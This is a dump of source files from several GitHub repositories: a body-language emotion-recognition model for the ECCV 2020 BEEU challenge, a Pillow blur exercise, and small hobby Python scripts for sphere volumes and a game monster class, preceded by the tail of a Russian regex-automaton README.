\n**Шаг 4** O((Q - min_Q) * Q), где Q - число состояний в ПДКА, min_Q - число состояний в МПДКА, \nчисло итераций(каждая из которых занимает O(Q)) не более, чем (Q - min_Q). \n**Шаг 5** O(|u|^2) \n**Итог** O(|u|^2 + Q * q * E)\n" } ]
2
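The README above (in Russian) describes the pipeline implemented in RegularExpressionAutomaton.py: given a regular expression α and a word u over {a,b,c}, build an NFA (with ε-transitions) from α, remove the ε-transitions, determinize, minimize, then run the minimal DFA from every starting position of u and keep the longest accepted substring. The expression syntax is reverse Polish: `+` is union, `.` is concatenation, `*` is the Kleene star, and `1` stands for the empty word. A small usage sketch follows, assuming the file above is importable as a module named RegularExpressionAutomaton; the sample expression and the expected value are worked out by hand here, not taken from the repository.

```python
# Sketch: calling the pipeline from RegularExpressionAutomaton.py directly.
# In the postfix syntax above, "ab.c+" means (a concatenated with b) union c.
from RegularExpressionAutomaton import count_length_of_the_longest_substring_matching

expression = "ab.c+"   # language {"ab", "c"}
word = "babca"

# Substrings of "babca" that belong to the language: "ab" (length 2) and "c"
# (length 1), so the call below should print 2.
print(count_length_of_the_longest_substring_matching(expression, word))
```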
VivianLiangB/NTUA-BEEU-eccv2020
https://github.com/VivianLiangB/NTUA-BEEU-eccv2020
4fd1dd081389faedb1eb119955914819f59336aa
db1d5dde5e60a57a5fa4d65f137410cfdfa8eca9
207a8e195d7b22963305095396ac52e97b99aa69
refs/heads/master
2023-03-18T03:09:21.606483
2021-03-04T20:07:54
2021-03-04T20:07:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6022052764892578, "alphanum_fraction": 0.622561514377594, "avg_line_length": 22.13725471496582, "blob_id": "494e1d47febf6396d266f30ba457ddb4ceb718ed", "content_id": "a66c54b1abda4391275413fb79a1cb851482ab01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 58, "num_lines": 51, "path": "/model/loss.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "import torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import Variable, Function\n\ndef nll_loss(output, target):\n return F.nll_loss(output, target)\n\n\ndef bce_loss(output, target):\n\n t = target.clone().detach()\n\n t[t >= 0.5] = 1 # threshold to get binary labels\n t[t < 0.5] = 0\n\n loss = F.binary_cross_entropy_with_logits(output, t)\n return loss\n\ndef combined_loss(output, target):\n l = F.mse_loss(output, target)\n\n l += bce_loss(output, target)\n\n return l\n\ndef mse_loss(output, target):\n\treturn F.mse_loss(output, target)\n\n\ndef mse_center_loss(output, target, labels):\n t = labels.clone().detach()\n t[t >= 0.5] = 1 # threshold to get binary labels\n t[t < 0.5] = 0\n\n target = target[0,:26]\n\n positive_centers = []\n for i in range(output.size(0)):\n p = target[t[i, :] == 1]\n if p.size(0) == 0:\n positive_center = torch.zeros(300).cuda()\n else:\n positive_center = torch.mean(p, dim=0)\n\n positive_centers.append(positive_center)\n\n positive_centers = torch.stack(positive_centers,dim=0)\n loss = F.mse_loss(output, positive_centers)\n \n return loss" }, { "alpha_fraction": 0.5576669573783875, "alphanum_fraction": 0.5712873339653015, "avg_line_length": 35.70161437988281, "blob_id": "7da19cae7cfe1dfb768d48c600e2b307f69178a7", "content_id": "c0d0f5913454e696b69e62ab05b047efa51d7401", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9104, "license_type": "no_license", "max_line_length": 113, "num_lines": 248, "path": "/model/models.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "from torch import nn\nimport torch.nn.functional\nimport torch\nfrom .ops.basic_ops import ConsensusModule, Identity\nfrom torch.nn.init import normal, constant\nfrom torch.nn import Parameter\nimport torchvision\nimport numpy as np\n\nclass TSN(nn.Module):\n def __init__(self, num_class, num_segments, modality,\n base_model='resnet18', new_length=None,\n consensus_type='avg', before_softmax=True,\n dropout=0.8, modalities_fusion='cat', \n crop_num=1, partial_bn=True, context=False, embed=False):\n super(TSN, self).__init__()\n self.modality = modality\n self.num_segments = num_segments\n self.reshape = True\n self.before_softmax = before_softmax\n self.dropout = dropout\n self.crop_num = crop_num\n self.consensus_type = consensus_type\n self.embed = embed\n\n self.name_base = base_model\n if not before_softmax and consensus_type != 'avg':\n raise ValueError(\"Only avg consensus can be used after Softmax\")\n\n if new_length is None:\n self.new_length = 1 if modality == \"RGB\" else 5\n else:\n self.new_length = new_length\n\n print((\"\"\"\nInitializing TSN with base model: {}.\nTSN Configurations:\n input_modality: {}\n num_segments: {}\n new_length: {}\n consensus_module: {}\n dropout_ratio: {}\n \"\"\".format(base_model, self.modality, self.num_segments, self.new_length, consensus_type, self.dropout)))\n self.embed = embed\n\n 
self._prepare_base_model(base_model)\n \n self.context = context\n\n if context:\n self._prepare_context_model()\n\n feature_dim = self._prepare_tsn(num_class)\n\n if self.modality == 'Flow':\n print(\"Converting the ImageNet model to a flow init model\")\n self.base_model = self._construct_flow_model(self.base_model)\n print(\"Done. Flow model ready...\")\n\n if self.context:\n print(\"Converting the context model to a flow init model\")\n self.context_model = self._construct_flow_model(self.context_model)\n print(\"Done. Flow model ready...\")\n\n\n self.consensus = ConsensusModule(consensus_type)\n self.consensus_cont = ConsensusModule(consensus_type)\n\n if self.embed:\n self.consensus_embed = ConsensusModule(consensus_type)\n\n if not self.before_softmax:\n self.softmax = nn.Softmax()\n\n self._enable_pbn = partial_bn\n if partial_bn:\n self.partialBN(True)\n\n def _prepare_tsn(self, num_class):\n std = 0.001\n\n if isinstance(self.base_model, torch.nn.modules.container.Sequential):\n feature_dim = 2048\n else:\n feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features\n if self.dropout == 0:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, num_class))\n self.new_fc = None\n else:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))\n\n if self.context:\n num_feats = 4096\n else:\n num_feats = 2048\n\n if self.embed:\n self.embed_fc = nn.Linear(num_feats,300)\n normal(self.embed_fc.weight, 0, std)\n constant(self.embed_fc.bias, 0)\n\n self.new_fc = nn.Linear(num_feats, num_class)\n normal(self.new_fc.weight, 0, std)\n constant(self.new_fc.bias, 0)\n\n self.new_fc_1 = nn.Linear(num_feats, 3)\n normal(self.new_fc_1.weight, 0, std)\n constant(self.new_fc_1.bias, 0)\n\n\n return num_feats\n\n\n def _prepare_context_model(self):\n self.context_model = getattr(torchvision.models, \"resnet50\")(True)\n modules = list(self.context_model.children())[:-1] # delete the last fc layer.\n self.context_model = nn.Sequential(*modules)\n\n def _prepare_base_model(self, base_model):\n import torchvision, torchvision.models\n\n if 'resnet' in base_model or 'vgg' in base_model or 'resnext' in base_model or 'densenet' in base_model:\n self.base_model = getattr(torchvision.models, base_model)(True)\n self.base_model.last_layer_name = 'fc'\n self.input_size = 224\n self.input_mean = [0.485, 0.456, 0.406]\n self.input_std = [0.229, 0.224, 0.225]\n\n if self.modality == 'Flow':\n self.input_mean = [0.5]\n self.input_std = [np.mean(self.input_std)]\n \n else:\n raise ValueError('Unknown base model: {}'.format(base_model))\n\n def train(self, mode=True):\n \"\"\"\n Override the default train() to freeze the BN parameters\n :return:\n \"\"\"\n super(TSN, self).train(mode)\n count = 0\n if self._enable_pbn:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n count = 0\n if self.context:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.context_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n\n\n def partialBN(self, enable):\n self._enable_pbn = enable\n\n def 
get_optim_policies(self):\n params = [{'params': self.parameters()}]\n\n return params\n\n\n\n def forward(self, input, embeddings):\n sample_len = (3 if self.modality == \"RGB\" else 2) * self.new_length\n\n if self.context:\n inp = input.view((-1, sample_len) + input.size()[-2:])\n\n body_indices = list(range(0,inp.size(0),2))\n context_indices = list(range(1,inp.size(0),2))\n\n body = inp[body_indices]\n context = inp[context_indices]\n else:\n body = input.view((-1, sample_len) + input.size()[-2:])\n\n base_out = self.base_model(body).squeeze(-1).squeeze(-1)\n\n if self.context:\n context_out = self.context_model(context).squeeze(-1).squeeze(-1)\n base_out = torch.cat((base_out, context_out),dim=1)\n\n outputs = {}\n\n if self.embed:\n embed_segm = self.embed_fc(base_out)\n embed = embed_segm.view((-1, self.num_segments) + embed_segm.size()[1:])\n embed = self.consensus_embed(embed).squeeze(1)\n outputs['embed'] = embed\n\n\n base_out_cat = self.new_fc(base_out)\n base_out_cont = self.new_fc_1(base_out)\n\n base_out_cat = base_out_cat.view((-1, self.num_segments) + base_out_cat.size()[1:])\n base_out_cont = base_out_cont.view((-1, self.num_segments) + base_out_cont.size()[1:])\n\n output = self.consensus(base_out_cat)\n outputs['categorical'] = output.squeeze(1)\n\n output_cont = self.consensus_cont(base_out_cont)\n outputs['continuous'] = output_cont.squeeze(1)\n\n return outputs\n\n\n def _construct_flow_model(self, base_model):\n # modify the convolution layers\n # Torch models are usually defined in a hierarchical way.\n # nn.modules.children() return all sub modules in a DFS manner\n modules = list(base_model.modules())\n first_conv_idx = list(filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules)))))[0]\n conv_layer = modules[first_conv_idx]\n container = modules[first_conv_idx - 1]\n\n # modify parameters, assume the first blob contains the convolution kernels\n params = [x.clone() for x in conv_layer.parameters()]\n kernel_size = params[0].size()\n new_kernel_size = kernel_size[:1] + (2 * self.new_length, ) + kernel_size[2:]\n new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n\n new_conv = nn.Conv2d(2 * self.new_length, conv_layer.out_channels,\n conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n bias=True if len(params) == 2 else False)\n new_conv.weight.data = new_kernels\n if len(params) == 2:\n new_conv.bias.data = params[1].data # add bias if neccessary\n layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n # replace the first convlution layer\n setattr(container, layer_name, new_conv)\n return base_model\n\n\n" }, { "alpha_fraction": 0.7021868824958801, "alphanum_fraction": 0.7371769547462463, "avg_line_length": 44.745452880859375, "blob_id": "7ce8fd484343458b57743872b91b7e742f424de2", "content_id": "c9ab74ae878b214987b6bdc236335218899e61ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 406, "num_lines": 55, "path": "/README.md", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "# NTUA-BEEU-ECCV\n\nWinning solution for the BEEU (First International Workshop on Bodily Expressed Emotion Understanding) challenge organized at ECCV2020. Please read the accompanied paper for more details. 
\n\n### Preparation\n* Download the [BoLD dataset](https://cydar.ist.psu.edu/emotionchallenge/index.php).\n* Use [https://github.com/yjxiong/temporal-segment-networks](https://github.com/yjxiong/temporal-segment-networks) in order to extract rgb and optical flow for the dataset.\n* Change the directories in \"dataset.py\" file.\n\n\n### Training\n\nTrain an RGB Temporal Segment Network on BoLD dataset:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb tsn\" -d 0,1,2,3\n\nAdd context branch:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb with context tsn\" -d 0,1,2,3 --context\n\nAdd visual embedding loss:\n\n> python train_tsn.py -c config_tsn.json --modality \"RGB\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb with context tsn\" -d 0,1,2,3 --context --embed\n\nChange modality to Flow:\n\n> python train_tsn.py -c config_tsn.json --modality \"Flow\" -b 32 --lr 1e-3 --arch resnet101 --workers 4 --num_segments 3 --exp_name \"rgb tsn\" -d 0,1,2,3\n\n\n### Pretrained Models\nWe also offer weights of an RGB with context model with 0.2213 validation ERS and a Flow model with 0.2157 validation ERS. Their fusion achieves an ERS of 0.2613 on the test set. You can download the pretrained models [here](https://ntuagr-my.sharepoint.com/:f:/g/personal/filby_ntua_gr/EkFAi_QSn9NDsFTylvoAJrQBuvh6eQWkbgTuZcyMWWPR2w?e=xxw6h9). An example on how to use them is shown in test_tsn.py script:\n\n> python test_tsn.py --modality \"RGB\" --arch resnet101 --workers 4 --context\n> python test_tsn.py --modality \"Flow\" --arch resnet101 --workers 4 \n\n\n## Citation\nIf you use this code for your research, consider citing our paper.\n```\n@inproceedings{NTUA_BEEU,\n title={Emotion Understanding in Videos Through Body, Context, and Visual-Semantic Embedding Loss},\n author={Filntisis, Panagiotis Paraskevas and Efthymiou, Niki and Potamianos, Gerasimos and Maragos, Petros},\n booktitle={ECCV Workshop on Bodily Expressed Emotion Understanding},\n year={2020}\n}\n```\n\n### Acknowlegements\n\n* [https://github.com/yjxiong/tsn-pytorch](https://github.com/yjxiong/tsn-pytorch)\n* [https://github.com/victoresque/pytorch-template](https://github.com/victoresque/pytorch-template)\n\n\n### Contact \nFor questions feel free to open an issue." 
}, { "alpha_fraction": 0.5527679920196533, "alphanum_fraction": 0.5648953914642334, "avg_line_length": 36.37716293334961, "blob_id": "c095aabebc50cab8c5c0d6c5e9c9282fb31e9df5", "content_id": "baa718f4831ed55e41b2a10389accec69d4e23bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10802, "license_type": "no_license", "max_line_length": 169, "num_lines": 289, "path": "/dataset.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "import torch.utils.data as data\nimport cv2\nfrom PIL import Image\nimport os\nimport os.path\nimport numpy as np\nfrom numpy.random import randint\nimport pandas as pd\nimport torch\nimport torchvision.transforms.functional as tF\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\nclass VideoRecord(object):\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n \n @property\n def min_frame(self):\n return int(self._data[2])\n\n @property\n def max_frame(self):\n return int(self._data[3])\n\n\nclass TSNDataSet(data.Dataset):\n def __init__(self, mode,\n num_segments=3, new_length=1, modality='RGB',\n image_tmpl='img_{:05d}.jpg', transform=None,\n force_grayscale=False, random_shift=True, test_mode=False, context=False):\n\n self.num_segments = num_segments\n self.new_length = new_length\n self.modality = modality\n self.image_tmpl = image_tmpl\n self.transform = transform\n self.random_shift = random_shift\n self.test_mode = test_mode\n\n self.bold_path = \"/gpu-data/filby/BoLD/BOLD_public\"\n\n self.context = context\n\n self.categorical_emotions = [\"Peace\", \"Affection\", \"Esteem\", \"Anticipation\", \"Engagement\", \"Confidence\", \"Happiness\",\n \"Pleasure\", \"Excitement\", \"Surprise\", \"Sympathy\", \"Doubt/Confusion\", \"Disconnect\",\n \"Fatigue\", \"Embarrassment\", \"Yearning\", \"Disapproval\", \"Aversion\", \"Annoyance\", \"Anger\",\n \"Sensitivity\", \"Sadness\", \"Disquietment\", \"Fear\", \"Pain\", \"Suffering\"]\n\n self.continuous_emotions = [\"Valence\", \"Arousal\", \"Dominance\"]\n\n self.attributes = [\"Gender\", \"Age\", \"Ethnicity\"]\n\n header = [\"video\", \"person_id\", \"min_frame\", \"max_frame\"] + self.categorical_emotions + self.continuous_emotions + self.attributes + [\"annotation_confidence\"]\n \n # self.df = pd.read_csv(os.path.join(self.bold_path, \"annotations/{}_extra.csv\".format(mode)))\n self.df = pd.read_csv(os.path.join(self.bold_path, \"annotations/{}.csv\".format(mode)), names=header)\n self.df[\"joints_path\"] = self.df[\"video\"].apply(rreplace,args=[\".mp4\",\".npy\",1])\n\n self.video_list = self.df[\"video\"]\n self.mode = mode\n\n self.embeddings = np.load(\"glove_840B_embeddings.npy\")\n\n def get_context(self, image, joints, format=\"cv2\"):\n joints = joints.reshape((18,3))\n joints[joints[:,2]<0.1] = np.nan\n joints[np.isnan(joints[:,2])] = np.nan\n\n joint_min_x = int(round(np.nanmin(joints[:,0])))\n joint_min_y = int(round(np.nanmin(joints[:,1])))\n\n joint_max_x = int(round(np.nanmax(joints[:,0])))\n joint_max_y = int(round(np.nanmax(joints[:,1])))\n\n expand_x = int(round(10/100 * (joint_max_x-joint_min_x)))\n expand_y = int(round(10/100 * (joint_max_y-joint_min_y)))\n\n if format == \"cv2\":\n image[max(0, joint_min_x - expand_x):min(joint_max_x + expand_x, image.shape[1])] = [0,0,0]\n elif format == \"PIL\":\n bottom = min(joint_max_y+expand_y, 
image.height)\n right = min(joint_max_x+expand_x,image.width)\n top = max(0,joint_min_y-expand_y)\n left = max(0,joint_min_x-expand_x)\n image = np.array(image)\n if len(image.shape) == 3:\n image[top:bottom,left:right] = [0,0,0]\n else:\n image[top:bottom,left:right] = np.min(image)\n return Image.fromarray(image)\n\n\n def get_bounding_box(self, image, joints, format=\"cv2\"):\n joints = joints.reshape((18,3))\n joints[joints[:,2]<0.1] = np.nan\n joints[np.isnan(joints[:,2])] = np.nan\n\n joint_min_x = int(round(np.nanmin(joints[:,0])))\n joint_min_y = int(round(np.nanmin(joints[:,1])))\n\n joint_max_x = int(round(np.nanmax(joints[:,0])))\n joint_max_y = int(round(np.nanmax(joints[:,1])))\n\n expand_x = int(round(100/100 * (joint_max_x-joint_min_x)))\n expand_y = int(round(100/100 * (joint_max_y-joint_min_y)))\n\n if format == \"cv2\":\n return image[max(0,joint_min_y-expand_y):min(joint_max_y+expand_y, image.shape[0]), max(0,joint_min_x-expand_x):min(joint_max_x+expand_x,image.shape[1])]\n elif format == \"PIL\":\n bottom = min(joint_max_y+expand_y, image.height)\n right = min(joint_max_x+expand_x,image.width)\n top = max(0,joint_min_y-expand_y)\n left = max(0,joint_min_x-expand_x)\n return tF.crop(image, top, left, bottom-top ,right-left)\n\n\n def joints(self, index):\n sample = self.df.iloc[index]\n\n joints_path = os.path.join(self.bold_path, \"joints\", sample[\"joints_path\"])\n\n joints18 = np.load(joints_path)\n joints18[:,0] -= joints18[0,0]\n\n return joints18\n\n def _load_image(self, directory, idx, index, mode=\"body\"):\n joints = self.joints(index)\n\n poi_joints = joints[joints[:, 0] + 1 == idx]\n sample = self.df.iloc[index]\n poi_joints = poi_joints[(poi_joints[:, 1] == sample[\"person_id\"]), 2:]\n if self.modality == 'RGB' or self.modality == 'RGBDiff':\n\n frame = Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert(\"RGB\")\n \n if mode == \"context\":\n if poi_joints.size == 0:\n return [frame]\n context = self.get_context(frame, poi_joints, format=\"PIL\")\n return [context]\n\n if poi_joints.size == 0:\n body = frame\n pass #just do the whole frame\n else:\n body = self.get_bounding_box(frame, poi_joints, format=\"PIL\")\n\n if body.size == 0:\n print(poi_joints)\n body = frame\n\n return [body]\n\n # return [Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert('RGB')]\n elif self.modality == 'Flow':\n frame_x = Image.open(os.path.join(directory, self.image_tmpl.format('flow_x', idx))).convert('L')\n frame_y = Image.open(os.path.join(directory, self.image_tmpl.format('flow_y', idx))).convert('L')\n # frame = cv2.imread(os.path.join(directory, 'img_{:05d}.jpg'.format(idx)))\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n if mode == \"context\":\n if poi_joints.size == 0:\n return [frame_x, frame_y]\n context_x = self.get_context(frame_x, poi_joints, format=\"PIL\")\n context_y = self.get_context(frame_y, poi_joints, format=\"PIL\")\n return [context_x, context_y]\n\n if poi_joints.size == 0:\n body_x = frame_x\n body_y = frame_y\n pass #just do the whole frame\n else:\n body_x = self.get_bounding_box(frame_x, poi_joints, format=\"PIL\")\n body_y = self.get_bounding_box(frame_y, poi_joints, format=\"PIL\")\n\n if body_x.size == 0:\n body_x = frame_x\n body_y = frame_y\n\n\n return [body_x, body_y]\n\n\n def _sample_indices(self, record):\n \"\"\"\n\n :param record: VideoRecord\n :return: list\n \"\"\"\n\n average_duration = (record.num_frames - self.new_length + 1) // self.num_segments\n if average_duration > 0:\n 
offsets = np.multiply(list(range(self.num_segments)), average_duration) + randint(average_duration, size=self.num_segments) # + (record.min_frame+1)\n # print(record.num_frames, record.min_frame, record.max_frame)\n elif record.num_frames > self.num_segments:\n offsets = np.sort(randint(record.num_frames - self.new_length + 1, size=self.num_segments))\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets + 1\n\n def _get_val_indices(self, record):\n if record.num_frames > self.num_segments + self.new_length - 1:\n tick = (record.num_frames - self.new_length + 1) / float(self.num_segments)\n offsets = np.array([int(tick / 2.0 + tick * x) for x in range(self.num_segments)])\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets + 1\n\n def _get_test_indices(self, record):\n\n tick = (record.num_frames - self.new_length + 1) / float(self.num_segments)\n\n offsets = np.array([int(tick / 2.0 + tick * x) for x in range(self.num_segments)])\n\n return offsets + 1\n\n def __getitem__(self, index):\n sample = self.df.iloc[index]\n\n fname = os.path.join(self.bold_path,\"videos\",self.df.iloc[index][\"video\"])\n\n capture = cv2.VideoCapture(fname)\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))-1\n\n capture.release()\n\n record_path = os.path.join(self.bold_path,\"test_raw\",sample[\"video\"][4:-4])\n\n record = VideoRecord([record_path, frame_count, sample[\"min_frame\"], sample[\"max_frame\"]])\n\n if not self.test_mode:\n segment_indices = self._sample_indices(record) if self.random_shift else self._get_val_indices(record)\n else:\n segment_indices = self._get_test_indices(record)\n\n return self.get(record, segment_indices, index)\n\n def get(self, record, indices, index):\n\n images = list()\n # print(indices)\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n \n seg_imgs = self._load_image(record.path, p, index, mode=\"body\")\n\n images.extend(seg_imgs)\n\n if self.context:\n seg_imgs = self._load_image(record.path, p, index, mode=\"context\")\n images.extend(seg_imgs)\n\n\n if p < record.num_frames:\n p += 1\n\n\n if not self.test_mode:\n categorical = self.df.iloc[index][self.categorical_emotions]\n\n continuous = self.df.iloc[index][self.continuous_emotions]\n continuous = continuous/10.0 # normalize to 0 - 1\n\n if self.transform is None:\n process_data = images\n else:\n process_data = self.transform(images)\n\n return process_data, torch.tensor(self.embeddings).float(), torch.tensor(categorical).float(), torch.tensor(continuous).float(), self.df.iloc[index][\"video\"]\n else:\n process_data = self.transform(images)\n return process_data, torch.tensor(self.embeddings).float()\n\n def __len__(self):\n return len(self.df)\n" } ]
4
tomaccosheep/teaching_pillow
https://github.com/tomaccosheep/teaching_pillow
a82c3e114c874743ad12db2bdbc19f2aa5c215f4
4bb1b1f95a7831e4db5545c54345ba8ba1071241
149002c29d6893bc4473e58b090658462ebf19bf
refs/heads/master
2020-03-30T11:15:35.556579
2018-10-01T21:32:06
2018-10-01T21:32:06
151,163,192
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.460234671831131, "alphanum_fraction": 0.49413299560546875, "avg_line_length": 32.34782791137695, "blob_id": "db1b40779df90ebb60d749f9f4502e7bbc303cc7", "content_id": "515a7933356ec48f86a9dd0ac5b23b165f5c5ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 767, "license_type": "no_license", "max_line_length": 83, "num_lines": 23, "path": "/lab16v1.py", "repo_name": "tomaccosheep/teaching_pillow", "src_encoding": "UTF-8", "text": "import colorsys\nfrom PIL import Image\nimg = Image.open(\"lenna.png\") # must be in same folder\nwidth, height = img.size\npixels = img.load()\n\nfor i in range(width):\n for j in range(height):\n if i + 50 < width and j + 50 < height:\n color_list = [0, 0, 0]\n for k in range(len(color_list)):\n for l in range(0, 50):\n color_list[k] += (pixels[i + l, j][k])/50\n \n else:\n color_list = pixels[i, j]\n #h, s, v = colorsys.rgb_to_hsv(r/255, g/255, b/255)\n #h = ((h) // user_input) * user_input\n #s = 1\n #v = .5\n #r, g, b = colorsys.hsv_to_rgb(h, s, v)\n pixels[i, j] = (int(color_list[0]), int(color_list[1]), int(color_list[2]))\nimg.show()\n" } ]
1
ivan-monge1989/pruebas
https://github.com/ivan-monge1989/pruebas
b2f85cc02db326acde08bbb2fb2227da858cc8c4
c50e4ad4dd7bc994978080b674bc931b3789ede2
67378cd2b048616460fc659ec6f145bcb6b46a8e
refs/heads/master
2017-12-31T14:09:40.682669
2017-04-05T21:59:37
2017-04-05T21:59:37
68,965,918
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.752293586730957, "alphanum_fraction": 0.752293586730957, "avg_line_length": 17.16666603088379, "blob_id": "78a64fa2ca3cc91e779d62391d8d6863c4d13866", "content_id": "65b6adacad19d7cc68e30a47f1f95aa7d0afcb38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/monster_type.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# Create several creatures for my game.\n\nimport monster\n\ncreep = monster.Monster()\nwitch = monster.Monster()\n" }, { "alpha_fraction": 0.5662811398506165, "alphanum_fraction": 0.6089857816696167, "avg_line_length": 24.545454025268555, "blob_id": "86a12c7c5dc9f1395a8339c4981ecd22c2d0c27f", "content_id": "08cae9f81c5405ffbecaaeeed60a89d42dc5be6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2248, "license_type": "no_license", "max_line_length": 72, "num_lines": 88, "path": "/sphere_volume.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# This script allows me to create a class of ball spheres which have the\n# properties of a metallic sphere from McMaser-Carr.\n\n# Little test for gagi\n\n\nclass Ball:\n \"\"\"Creates a Ball class for metal spheres in McMaster-Carr.\n\n Arguments:\n dia (float): Diameter of the sphere\n qty (int): Quantity of balls in the bags\n price (float): Price per bag\n \"\"\"\n def __init__(self, dia=1, qty=1, price=1):\n import math\n self.dia = dia\n self.qty = qty\n self.price = price\n self.rad = dia/2\n self.vol = ((4/3) * math.pi * self.rad ** 3) * self.qty\n self.quarts = self.vol * 0.017316\n\n\n# Create a function to display ball data\ndef display_ball(balls, bags):\n \"\"\"\n Prints out ball data for each sphere.\n \"\"\"\n\n for i in balls:\n print(\"Ball Data:\")\n print(\"Diameter: \" + str(i.dia) + \"in\")\n print(\"Total Vol: \" + str(i.quarts * bags) + \"qts\")\n print(\"Total Qty of balls: \" + str(i.qty * bags))\n print(\"Total Price: $\" + str(i.price * bags) + \"\\n\")\n\n\n# Creates a function to convert milliliters to cubic inches\ndef mL_to_in3(vol):\n \"\"\"\n Converts milliliters to cubic inches.\n \"\"\"\n\n milliliters = vol * 0.0610237\n return milliliters\n\n\n# Creates a function to conver cubic inches to milliliters\ndef in3_to_mL(vol):\n \"\"\"\n Converts cubic inches to milliliters\n \"\"\"\n\n cubic_inches = vol * 16.3871\n return cubic_inches\n\n\n# Creates a function to determine the amount of minimal solvent\ndef solvent_qty(width, length, height, ball, bags, vane_vol):\n \"\"\"\n Returns the minimal amount of solvent required\n \"\"\"\n\n pyrex_vol = width * length * height\n slab_vol1 = 40\n slab_vol2 = 40\n ball_vol = ball.vol * bags\n\n tot_disp_vol = slab_vol1 + slab_vol2 + ball_vol + vane_vol\n\n req_vol = pyrex_vol - tot_disp_vol\n return req_vol\n\n\n# Ball Data from McMaster-Carr\nball_5_8 = Ball(5/8, 50, 7.65)\nball_3_4 = Ball(3/4, 25, 7.67)\nball_7_8 = Ball(7/8, 20, 9.82)\nball_1_0 = Ball(1.0, 10, 6.82)\nballs = [ball_5_8, ball_3_4, ball_7_8, ball_1_0]\nbags = 5\n\nvane_vol = mL_to_in3(100 * 4)\ndynasol = in3_to_mL(solvent_qty(9, 13, 2, ball_7_8, bags, vane_vol))\nprint(dynasol)\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 30.5, "blob_id": "e508dd1baafdf8066e346893199ffda06c70034c", "content_id": 
"d1afb1e62d2da9364442ce0035a8c00589eb8ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 67, "num_lines": 4, "path": "/README.md", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# prueba-windows\n\nThis is just a simple testing document.\nI am trying to compile some files and push and pull them to Github.\n" }, { "alpha_fraction": 0.5645756721496582, "alphanum_fraction": 0.5848708748817444, "avg_line_length": 23.636363983154297, "blob_id": "1e9d4fbe56e625fa1f5b0fae52cd5b6d6aadbbaf", "content_id": "a4a5142b162253eeb4f52e5f8ff3ec0c494296bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/monster.py", "repo_name": "ivan-monge1989/pruebas", "src_encoding": "UTF-8", "text": "# This is a monster class for my little game.\n# This is also an example file.\n\nclass Monster:\n \"\"\"Creater a monster class with basic Health Points (HP)\n and Magic Points (MP).\"\"\"\n\n def __init__(self):\n self.hp = 10\n self.mp = 5\n\n def decrease_health(self, factor= 1):\n self.hp -= 1 * factor\n\n def increase_health(self, factor= 1):\n self.hp += 1 * factor\n\n def increase_magic(self, factor= 1):\n self.mp += 1 * factor\n\n def 